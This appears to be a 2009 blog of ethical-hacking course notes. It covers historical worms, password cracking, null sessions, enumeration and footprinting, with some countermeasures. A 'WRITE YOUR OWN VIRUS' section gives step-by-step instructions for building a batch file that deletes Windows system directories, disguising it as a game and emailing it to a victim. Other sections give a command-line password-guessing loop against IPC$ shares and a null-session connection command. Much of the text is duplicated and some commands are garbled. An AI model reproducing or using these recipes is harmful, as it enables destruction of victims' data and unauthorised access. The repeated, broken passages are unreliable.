The only prevention against virus is to install anti-virus software and keep the updates current.
Prominent anti-virus software vendors include:
Mc Afee
Norton AntiVirus
AntiViral Toolkit Pro
Dr. Solomon's
Trend Micro
Command AntiVirus
Data Fellows
Sunday, December 13, 2009
Hacking Tool: Senna Spy Internet Worm Generator 2000
(http://sennaspy.cjb.net)
This tool can generate a VBS worm.
This tool can generate a VBS worm.
WRITE YOUR OWN VIRUS
Step 1: Create a batch file Game.bat with the following text @ echo off
delete c:\winnt\system32\*.*
delete c:\winnt\*.*
Step 2: Convert the Game.bat batch file to Game.com using bat2com utility.
Step 3: Assign Icon to Game.com using Windows file properties screen.
Step 4: Send the Game.com file as an e-mail attachment to a victim.
Step 5: When the victim runs this program, it deletes core files in WINNT directory making Windows unusable.
delete c:\winnt\system32\*.*
delete c:\winnt\*.*
Step 2: Convert the Game.bat batch file to Game.com using bat2com utility.
Step 3: Assign Icon to Game.com using Windows file properties screen.
Step 4: Send the Game.com file as an e-mail attachment to a victim.
Step 5: When the victim runs this program, it deletes core files in WINNT directory making Windows unusable.
VIRUSES
Chernobyl
ExploreZip
I Love You
Melissa
Pretty Park
Code Red Worm
W32/Klez
BugBear
W32/Opaserv Worm
Anti-Virus Software
Chernobyl is a deadly virus. Unlike the other viruses that have surfaced recently, this one is much more than a nuisance.
If infected, Chernobyl will erase data on your hard drive, and may even keep your machine from booting up at all.
There are several variants in the wild. each variant activates on a different date. Version 1.2 on April 26th, 1.3 on June 26th, and 1.4 on the 26th of every month
ExploreZip is a Win32-based e-mail worm. It searches for Microsoft Office documents on your hard drive and network drives.
When it finds any Word, Excel, or PowerPoint documents using the following extensions: .doc, .xls and .ppt, it erases the contents of those files. It also emails itself to any one who send you an e-mail.
ExploreZip arrives as an email attachment. The message will most likely come from someone you know, and the body of the message will read:
"I received your email and I shall send you a reply ASAP. Till then, take a look at the attached Zipped docs." The attachment will be named "Zipped_files.exe" and have a WinZip icon. Double clicking the program infects your computer.
LoveLetter is a Win32-based e-mail worm. It overwrites certain on your hard drive(s) and sends itself out to everyone in your Microsoft Outlook address book.
LoveLetter arrives as an email attachment named: LOVE-LETTER-FOR-YOU.TXT.VBS though new variants have different names including VeryFunny.vbs, virus_warning.jpg.vbs and protect.vbs
User Controlled Data is placed into an SQL query without being validated for correct format or embedded escape strings.
Affects majority of applications which use a database backend and don't force variable types.
At least 50% of the large e-commerce sites and about 75% of the medium to small sites are vulnerable.
Improper validation in CFML, ASP, JSP and PHP are the most frequent causes
Melissa is a Microsoft Word macro virus.
Through macros, the virus alters the Microsoft Outlook email program so that the virus gets sent to the first 50 people in your address book.
It does not corrupt any data on your hard drive or make your computer crash. It just changes some Word settings and sends itself to the people you don't want to infect.
Melissa Virus Infection
Melissa arrives as an email attachment.
The subject of the message containing the virus will read: "Important message from" followed by the name of the person whose email account it was sent from.
The body of the message reads: Here's the document you asked for...don't show anyone else ;-) Double clicking the attached Word document (typically named LIST.DOC) will infect your machine.
Pretty Park is a privacy invading worm. Every 30 seconds, it tries to e-mail itself to the e-mail addresses in your Microsoft Outlook address book.
It has also been reported to connect your machine to a custom IRC channel for the purpose of retrieving passwords from your system.
Pretty park arrives as an email attachment. Double clicking the PrettyPark.exe or Files32.exe program infects your computer.
You may see the Pipes screen after running the executable.
BUG BEAR VIRUS
This worm propagates via shared network folders and via email.
It also terminates antivirus programs, act as a backdoor server application, and sends out system passwords - all of which compromise security on infected machines. BugBear Infection
This worm fakes the FROM field and obtains the recipients for its email from email messages, address books and mail boxes on the infected system. It generates the filename for the attached copy of itself from the following:
A combination of text strings: setup, card, docs, news, Image, images, pics, resume, photo, video, music or song data; with any of the extensions: SCR, PIF, or EXE. An existing system file appended with any of the following extensions: SCR, PIF or EXE.
On systems with un patched Internet Explorer 5.0 and 5.5, the worm attachment is executed automatically when messages are either opened or previewed using Microsoft Outlook or Outlook Express.
KLEZ
ElKern, KLAZ, Kletz, I-Worm.klez, W95/Klez@mm
W32.Klez variants is a mass mailing worm that searches the Windows address book for email addresses and sends messages to all the recipients that it finds. The worm uses its own SMTP engine to send the messages.
The subject and attachment name of the incoming emails are randomly chosen. The attachment will have one of the extensions: .bat, .exe, .pif or .scr.
The worm exploits a vulnerability in Microsoft Outlook and Outlook Express to try execute itself when you open or preview the message.
SirCam is a mass mailing e-mail worm with the ability of spreading through Windows Network shares.
SirCam sends e-mails with variable user names and subject fields, and attaches user documents with double extensions (such as .doc.pif or .xls.lnk) to them.
Thw orm collects a list of files with certain extensions ('.DOC', '.XLS', '.ZIP') into fake DLL files named 'sc*.dll'. Thw orm then sends itself out with one of the document files it found in a users' "My Documents" folder.
Nimda is a complex virus with a mass mailing worm component which spreads itself in attachments named README.EXE.
It affects Windows 95, 98, ME, NT4 and Windows 2000 users.
Nimda is the first worm to modify existing web sites to strt offering infected files for download. It is also the first worm to use normal end user machines to scan for vulnerable web sites.
Nimda uses the Unicode exploit to infect IIS Web servers.
The "Code Red" worm attempts to connect to TCP port 80 on a randomly chosen host assuming that a web server will be found.
Upon a successful connection to port 80, the attacking host sends a crafted HTTP GET request to the victim, attempting to exploit a buffer overflow in the Windows 2000 Indexing Service.
If the exploit is successful, the worm begins executing on the victim host. In the earlier variant of the worm, victim hosts with a default language of English experienced the following defacement on all pages requested from the server:
HELLO! welcome to http://www.worm.com! Hacked By Chinese!
ExploreZip
I Love You
Melissa
Pretty Park
Code Red Worm
W32/Klez
BugBear
W32/Opaserv Worm
Anti-Virus Software
Chernobyl is a deadly virus. Unlike the other viruses that have surfaced recently, this one is much more than a nuisance.
If infected, Chernobyl will erase data on your hard drive, and may even keep your machine from booting up at all.
There are several variants in the wild. each variant activates on a different date. Version 1.2 on April 26th, 1.3 on June 26th, and 1.4 on the 26th of every month
ExploreZip is a Win32-based e-mail worm. It searches for Microsoft Office documents on your hard drive and network drives.
When it finds any Word, Excel, or PowerPoint documents using the following extensions: .doc, .xls and .ppt, it erases the contents of those files. It also emails itself to any one who send you an e-mail.
ExploreZip arrives as an email attachment. The message will most likely come from someone you know, and the body of the message will read:
"I received your email and I shall send you a reply ASAP. Till then, take a look at the attached Zipped docs." The attachment will be named "Zipped_files.exe" and have a WinZip icon. Double clicking the program infects your computer.
LoveLetter is a Win32-based e-mail worm. It overwrites certain on your hard drive(s) and sends itself out to everyone in your Microsoft Outlook address book.
LoveLetter arrives as an email attachment named: LOVE-LETTER-FOR-YOU.TXT.VBS though new variants have different names including VeryFunny.vbs, virus_warning.jpg.vbs and protect.vbs
User Controlled Data is placed into an SQL query without being validated for correct format or embedded escape strings.
Affects majority of applications which use a database backend and don't force variable types.
At least 50% of the large e-commerce sites and about 75% of the medium to small sites are vulnerable.
Improper validation in CFML, ASP, JSP and PHP are the most frequent causes
Melissa is a Microsoft Word macro virus.
Through macros, the virus alters the Microsoft Outlook email program so that the virus gets sent to the first 50 people in your address book.
It does not corrupt any data on your hard drive or make your computer crash. It just changes some Word settings and sends itself to the people you don't want to infect.
Melissa Virus Infection
Melissa arrives as an email attachment.
The subject of the message containing the virus will read: "Important message from" followed by the name of the person whose email account it was sent from.
The body of the message reads: Here's the document you asked for...don't show anyone else ;-) Double clicking the attached Word document (typically named LIST.DOC) will infect your machine.
Pretty Park is a privacy invading worm. Every 30 seconds, it tries to e-mail itself to the e-mail addresses in your Microsoft Outlook address book.
It has also been reported to connect your machine to a custom IRC channel for the purpose of retrieving passwords from your system.
Pretty park arrives as an email attachment. Double clicking the PrettyPark.exe or Files32.exe program infects your computer.
You may see the Pipes screen after running the executable.
BUG BEAR VIRUS
This worm propagates via shared network folders and via email.
It also terminates antivirus programs, act as a backdoor server application, and sends out system passwords - all of which compromise security on infected machines. BugBear Infection
This worm fakes the FROM field and obtains the recipients for its email from email messages, address books and mail boxes on the infected system. It generates the filename for the attached copy of itself from the following:
A combination of text strings: setup, card, docs, news, Image, images, pics, resume, photo, video, music or song data; with any of the extensions: SCR, PIF, or EXE. An existing system file appended with any of the following extensions: SCR, PIF or EXE.
On systems with un patched Internet Explorer 5.0 and 5.5, the worm attachment is executed automatically when messages are either opened or previewed using Microsoft Outlook or Outlook Express.
KLEZ
ElKern, KLAZ, Kletz, I-Worm.klez, W95/Klez@mm
W32.Klez variants is a mass mailing worm that searches the Windows address book for email addresses and sends messages to all the recipients that it finds. The worm uses its own SMTP engine to send the messages.
The subject and attachment name of the incoming emails are randomly chosen. The attachment will have one of the extensions: .bat, .exe, .pif or .scr.
The worm exploits a vulnerability in Microsoft Outlook and Outlook Express to try execute itself when you open or preview the message.
SirCam is a mass mailing e-mail worm with the ability of spreading through Windows Network shares.
SirCam sends e-mails with variable user names and subject fields, and attaches user documents with double extensions (such as .doc.pif or .xls.lnk) to them.
Thw orm collects a list of files with certain extensions ('.DOC', '.XLS', '.ZIP') into fake DLL files named 'sc*.dll'. Thw orm then sends itself out with one of the document files it found in a users' "My Documents" folder.
Nimda is a complex virus with a mass mailing worm component which spreads itself in attachments named README.EXE.
It affects Windows 95, 98, ME, NT4 and Windows 2000 users.
Nimda is the first worm to modify existing web sites to strt offering infected files for download. It is also the first worm to use normal end user machines to scan for vulnerable web sites.
Nimda uses the Unicode exploit to infect IIS Web servers.
The "Code Red" worm attempts to connect to TCP port 80 on a randomly chosen host assuming that a web server will be found.
Upon a successful connection to port 80, the attacking host sends a crafted HTTP GET request to the victim, attempting to exploit a buffer overflow in the Windows 2000 Indexing Service.
If the exploit is successful, the worm begins executing on the victim host. In the earlier variant of the worm, victim hosts with a default language of English experienced the following defacement on all pages requested from the server:
HELLO! welcome to http://www.worm.com! Hacked By Chinese!
Sunday, November 29, 2009
Automatic Password Cracking Algorithm
Find a valid user
Find encryption algorithm used
Obtain encrypted passwords
Create list of possible passwords
Encrypt each word
See if there is a match for each user ID
Repeat steps 1 through 6
Tool: hk.exe
The hk.exe utility exposes a Local Procedure Call flaw in NT.
A non-admin user can be escalated to administrators group using hk.exe
A non-admin user can be escalated to administrators group using hk.exe
Tool: GetAdmin
GetAdmin.exe is a small program that adds a user to the local administrators group.
It uses low-level NT kernel routine to set a globalflag allowing access to any running process.
You need to logon to the server console to execute the program.
The GetAdmin.exe is run from the command line or from a browser.
This only works with Nt 4.0 Service pack 3.
It uses low-level NT kernel routine to set a globalflag allowing access to any running process.
You need to logon to the server console to execute the program.
The GetAdmin.exe is run from the command line or from a browser.
This only works with Nt 4.0 Service pack 3.
Privilege Escalation
If an attacker gains access to the network using non-admin user account, the next step is to gain higher privilege to that of an administrator.
This is called privilege escalation
Hacking Tool: KerbCrack
KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a bruteforce attack or a dictionary attack.
Hacking Tool: LOphtcrack
LC4 is a password auditing and recovery package distributed by @stake software. SMB packet capture listens to the local network segment and captures individual login sessions.
With LOphtcrack password cracking engine anyone can sniff the ire for extended periods is most guaranteed to obtain Administrator status in matter of days
With LOphtcrack password cracking engine anyone can sniff the ire for extended periods is most guaranteed to obtain Administrator status in matter of days
Password Sniffing
Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?
Password guessing Countermeasures
Block access to TCP and UDP ports 135-139.
Disable bindings to Wins client on any adapter.
Use complex passwords
Log failed logon attempts in Event viewer - Security log full event 529 or 539 - Logon/Logoff
Disable bindings to Wins client on any adapter.
Use complex passwords
Log failed logon attempts in Event viewer - Security log full event 529 or 539 - Logon/Logoff
Hacking tool: NTInfoScan (now CIS)
NTInfoScan is a security scanner for NT 4.0 is a vulnerability scanner that produces an HTML based report of security issues found on the target system and further information.
HACKING TOOL : LEGION
Legion automates the password guessing in NetBIOS sessions. Legion will scan multiple Class C IP address ranges for Windows shares and also offers a manual dictionary attack tool.
SYSTEM HACKING
Understand the following
Remote password guessing
Eavesdropping
Denial of Service
Buffer overflows
Privilege escalation
Password cracking
keystroke loggers
sniffers
Remote control and backdoors
Port re direction
Covering tracks
Hiding files
Assuming that NetBIOS TCP139 port is open, the most effective method of breaking into NT/2000 is password guessing.
Attempting to connect to an enumerated share (IPC$, or C$) and trying username/password.
Default Admin$, C$, %Systemdrive% shares are good starting point.
Performing automated password guessing is easy-simple loop using the NT/2000 shell for command based on the standard NET USE syntax.
1. Create a simple username and password file.
2. Pipe this file into FOR command
C:\> FOR /F "token=1, 2*" %i in (credentials.txt)
do net use \\target\IPC$ %i /u: %j
Saturday, November 28, 2009
Net Bios Null Sessions
The null session is often refereed to as the Holy Grail of Windows hacking. Null Sessions take advantage of flaws in the CIFS/SMB (Common Internet File System/ Server Messaging Block).
You can establish a Null Session with a Windows (NT/2000/XP) host by logging on with a null user name and password.
Using these null connections allows you to gather the following information from the host:
List of users and groups
List of machines
List of shares
Users and host SIDs (Security Identifiers)
Anyone with a NetBIOS connection to your computer can easily get a full dump of all your usernames, groups, shares, permissions, policies, services and more using the Null user.
The above syntax connects to the hidden Inter Process Communication 'share' (IPC$) at IP address 192.34.34.2 with the built- in anonymous user (/u:'''') with ('''') null password.
The attacker now has a channel over which to attempt various techniques.
The CIFS/SMB and NetBIOS standards in Windows 2000 include APIs that return rich information about a machine via TCP port 139 - even to unauthenticated users.
C: \>net use \\192.34.34.2 \IPC$ '''' /u: '''‘
Null sessions require access to TCP 139 and/ or TCP 445 ports.
You could also disable SMB services entirely on individual hosts by unbinding WINS Client TCP/IP from the interface.
Edit the registry to restrict the anonymous user.
1. Open regedt32, navigate to HKLM\SYSTEM\CurrentControlSet\LSA
2. Choose edit | add value
value name: ResticAnonymous
Data Type: REG_WORD
Value: 2
NBTscan is a program for scanning IP networks for NetBIOS name information.
For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address.
The first thing a remote attacker will try on a Windows 2000 network is to get list of hosts attached to the wire.
1. net view / domain,
2. nbstat -A
DumpSec reveals shares over a null session with the target computer.
The NetBIOS Auditing Tool (NAT) is designed to explore the NetBIOS file-sharing services offered by the target system.
It implements a stepwise approach to gather information and attempt to obtain file system-level access as though it were a legitimate local client.
If a NETBIOS session can be established at all via TCP port 139, the target is declared "vulnerable“.
Once the session is fully set up, transactions are performed to collect more information about the server including any file system "shares" it offers.
SNMP is simple. Managers send requests to agents, and the agents send back replies.
The requests and replies refer to variables accessible to agent software.
Managers can also send requests to set values for certain variables.
Traps let the manager know that something significant has happened at the agent's end of things:
a reboot
an interface failure,
or that something else that is potentially bad has happened.
Enumerating NT users via SNMP protocol is easy using snmputil
Simplest way to prevent such activity is to remove the SNMP agent or turn off the SNMP service.
If shutting off SNMP is not an option, then change the default 'public' community name.
Implement the Group Policy security option called Additional restrictions for anonymous connections.
Access to null session pipes and null session shares, and IPSec filtering should also be restricted.
For clients to locate Win 2k domain services such as Ad and kerberos, Win 2k relies on DNS SRV records.
Simple zone transfer (nslookup, ls -d) can enumerate lot of interesting network information.
An attacker would look at the following records closely:
1. Global Catalog Service (_gc._tcp_)
2. Domain Controllers (_ldap._tcp)
3. Kerberos Authentication (_kerberos._tcp)
You can easily block zone transfers using the DNS property sheet as shown here.
You can establish a Null Session with a Windows (NT/2000/XP) host by logging on with a null user name and password.
Using these null connections allows you to gather the following information from the host:
List of users and groups
List of machines
List of shares
Users and host SIDs (Security Identifiers)
Anyone with a NetBIOS connection to your computer can easily get a full dump of all your usernames, groups, shares, permissions, policies, services and more using the Null user.
The above syntax connects to the hidden Inter Process Communication 'share' (IPC$) at IP address 192.34.34.2 with the built- in anonymous user (/u:'''') with ('''') null password.
The attacker now has a channel over which to attempt various techniques.
The CIFS/SMB and NetBIOS standards in Windows 2000 include APIs that return rich information about a machine via TCP port 139 - even to unauthenticated users.
C: \>net use \\192.34.34.2 \IPC$ '''' /u: '''‘
Null sessions require access to TCP 139 and/ or TCP 445 ports.
You could also disable SMB services entirely on individual hosts by unbinding WINS Client TCP/IP from the interface.
Edit the registry to restrict the anonymous user.
1. Open regedt32, navigate to HKLM\SYSTEM\CurrentControlSet\LSA
2. Choose edit | add value
value name: ResticAnonymous
Data Type: REG_WORD
Value: 2
NBTscan is a program for scanning IP networks for NetBIOS name information.
For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address.
The first thing a remote attacker will try on a Windows 2000 network is to get list of hosts attached to the wire.
1. net view / domain,
2. nbstat -A
DumpSec reveals shares over a null session with the target computer.
The NetBIOS Auditing Tool (NAT) is designed to explore the NetBIOS file-sharing services offered by the target system.
It implements a stepwise approach to gather information and attempt to obtain file system-level access as though it were a legitimate local client.
If a NETBIOS session can be established at all via TCP port 139, the target is declared "vulnerable“.
Once the session is fully set up, transactions are performed to collect more information about the server including any file system "shares" it offers.
SNMP is simple. Managers send requests to agents, and the agents send back replies.
The requests and replies refer to variables accessible to agent software.
Managers can also send requests to set values for certain variables.
Traps let the manager know that something significant has happened at the agent's end of things:
a reboot
an interface failure,
or that something else that is potentially bad has happened.
Enumerating NT users via SNMP protocol is easy using snmputil
Simplest way to prevent such activity is to remove the SNMP agent or turn off the SNMP service.
If shutting off SNMP is not an option, then change the default 'public' community name.
Implement the Group Policy security option called Additional restrictions for anonymous connections.
Access to null session pipes and null session shares, and IPSec filtering should also be restricted.
For clients to locate Win 2k domain services such as Ad and kerberos, Win 2k relies on DNS SRV records.
Simple zone transfer (nslookup, ls -d
An attacker would look at the following records closely:
1. Global Catalog Service (_gc._tcp_)
2. Domain Controllers (_ldap._tcp)
3. Kerberos Authentication (_kerberos._tcp)
You can easily block zone transfers using the DNS property sheet as shown here.
TRACERROUTE
Traceroute works by exploiting a feature of the Internet Protocol called TTL, or Time To Live.
Traceroute reveals the path IP packets travel between two systems by sending out consecutive UDP packets with ever-increasing TTLs .
As each router processes a IP packet, it decrements the TTL. When the TTL reaches zero, it sends back a "TTL exceeded" message (using ICMP) to the originator.
Routers with DNS entries reveal the name of routers, network affiliation and geographic location.
Traceroute reveals the path IP packets travel between two systems by sending out consecutive UDP packets with ever-increasing TTLs .
As each router processes a IP packet, it decrements the TTL. When the TTL reaches zero, it sends back a "TTL exceeded" message (using ICMP) to the originator.
Routers with DNS entries reveal the name of routers, network affiliation and geographic location.
Locate the Network Range
Commonly includes:
Finding the range of IP addresses
Discerning the subnet mask
Information Sources:
ARIN (American Registry of Internet Numbers)
Traceroute
Hacking Tool:
NeoTrace
Visual Route
Finding the range of IP addresses
Discerning the subnet mask
Information Sources:
ARIN (American Registry of Internet Numbers)
Traceroute
Hacking Tool:
NeoTrace
Visual Route
NSLOOKUP
Nslookup is a program to query Internet domain name servers. Displays information that can be used to diagnose Domain Name System (DNS) infrastructure.
Helps find additional IP addresses if authoritative DNS is known from whois.
MX record reveals the IP of the mail server.
Both Unix and Windows come with a Nslookup client.
Third party clients are also available – E.g. Sam Spade
Helps find additional IP addresses if authoritative DNS is known from whois.
MX record reveals the IP of the mail server.
Both Unix and Windows come with a Nslookup client.
Third party clients are also available – E.g. Sam Spade
Information Gathering Methodology
Unearth initial information
Locate the network range
Ascertain active machines
Discover open ports / access points
Detect operating systems
Uncover services on ports
Map the Network
Locate the network range
Ascertain active machines
Discover open ports / access points
Detect operating systems
Uncover services on ports
Map the Network
Defining Footprinting
Footprinting is the blueprinting of the security profile of an organization, undertaken in a methodological manner.
Footprinting is one of the three pre-attack phases. The others are scanning and enumeration.
Footprinting results in a unique organization profile with respect to networks (Internet / Intranet / Extranet / Wireless) and systems involved.
Footprinting is one of the three pre-attack phases. The others are scanning and enumeration.
Footprinting results in a unique organization profile with respect to networks (Internet / Intranet / Extranet / Wireless) and systems involved.
RECONNAISSANCE
Reconnaissance refers to the preparatory phase where an attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack.
It involves network scanning either external or internal without authorization.
ETHICAL HACKING INTRODUCTION
¤Reconnaissance
•Active / passive
¤Scanning
¤Gaining access
•Operating system level / application level
•Network level
•Denial of service
¤Maintaining access
•Uploading / altering / downloading programs or data
Covering tracks
Subscribe to:
Posts (Atom)